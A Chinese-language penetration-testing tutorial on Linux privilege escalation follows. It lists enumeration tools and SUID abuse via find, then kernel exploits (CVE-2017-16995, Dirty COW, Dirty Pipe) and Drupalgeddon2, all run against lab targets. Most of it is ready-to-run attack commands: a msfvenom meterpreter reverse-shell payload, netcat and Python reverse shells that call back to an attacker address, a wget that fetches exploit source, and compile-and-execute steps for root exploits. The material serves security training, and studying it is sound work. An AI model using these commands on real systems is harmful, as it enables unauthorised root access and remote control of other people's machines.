【权限提升】Linux系统&辅助项目&脏牛&Dirty&内核漏洞&SUID&GUID

一些漏洞扫描项目&探针&提权命令查询

综合类探针：

https://github.com/liamg/traitor

自动化提权：

https://github.com/AlessandroZ/BeRoot

信息收集：

https://github.com/rebootuser/LinEnum

https://github.com/sleventyeleven/linuxprivchecker

漏洞探针：

https://github.com/mzet-/linux-exploit-suggester

https://github.com/jondonas/linux-exploit-suggester-2

二进制文件提权命令查询平台：

Linux：https://gtfobins.github.io/

Windows：https://lolbas-project.github.io/

配置安全SUID提权-探针&利用-云服务器

漏洞成因：chmod u+s给予了suid u-s删除了suid
使程序在运行中受到了suid root权限的执行过程导致

提权过程：探针是否有SUID(手工或脚本)-特定SUID利用-利用吃瓜-GG

手工命令探针安全：

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

脚本项目探针安全：

LinEnum.sh traitor linuxprivchecker 检测可能存在SUID利用

参考利用：

https://gtfobins.github.io/

https://pentestlab.blog/2017/09/25/suid-executables/ 提供可用命令参数 是否能给我们提供提权途径

Nmap Vim find Bash More Less Nano cp

这里利用find命令 管理员为了文件查找的结果更多，赋予了fin查找程序suid root权限

并且 find命令可以使用参数与其他命令进行结合使用

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.146 LPORT=4444 -f elf > mshell.elf
use exploit/multi/handler #使用监听模块
set payload linux/x64/meterpreter/reverse_tcp #使用和木马相同的payload
哥斯拉运行mshell.elf后门 上线

touch whgojp
find whgojp -exec whoami \;

利用NC反弹：注：linux下nc版本默认低版本 没有-e参数

find whgojp -exec netcat -lvp 5555 -e /bin/sh \;
netcat xx.xx.xx.xx 5555

利用Python反弹：linux自带python环境

find whgojp -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.146",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' \;
nc -lvp 7777

使用nc监听7777端口

成功使用suid提权至root权限

内核漏洞本地用户提权-探针&利用-Mozhe

提权过程：连接-获取可利用漏洞-下载或上传EXP-编译EXP-给权限执行-GG

探针项目：BeRoot linux-exploit-suggester linux-exploit-suggester2

ssh连接本地低权限用户

上传漏洞探针脚本，赋予执行权限

$ ./les.sh

$ ./linux-exploit-suggester-2.pl

cve-2017-16995漏洞利用

gcc cve-2017-16995 -o cve-2017-16995
chmod +x cve-2017-16995
./cve-2017-16995
id

内核漏洞Web用户提权-探针&利用-脏牛dcow

脏牛vulhub靶机 百度云盘

nmap 扫描到靶机地址以及对应开放服务 根据页面识别为Drupal框架

nmap 10.10.10.0/24
nmap -p1-65535 10.10.10.148

使用msf进行溢出利用

search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 10.10.10.148
set rport 1898
run

内核提权整个过程：（linux-exploit-suggester获取信息哦）

vulnhub靶机-探针目标-CMS漏洞利用-脚本探针提权漏洞-利用内核提权-GG

上传les.sh 进行漏洞探测

内核漏洞提权过程：寻可用-下exp-上/tmp-编译exp-执行(无权限用chmod)

当然其中也包括了脏牛漏洞以及漏洞利用exp

upload /root/dcow.cpp /tmp/dcow.cpp
cd /tmp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
./dcow
su root

成功拿到靶机

内核漏洞本地用户提权-探针&利用-DirtyPipe

Dirty Pipe(CVE-2022-0847)
5.8<=Linux kernel<5.16.11/5.15.25/5.10.102

wget https://haxx.in/files/dirtypipez.c --no-check-certificate
gcc -o dirtypipez dirtypipez.c
./dirtypipez /usr/bin/su  #任何具体suid权限的文件均可
id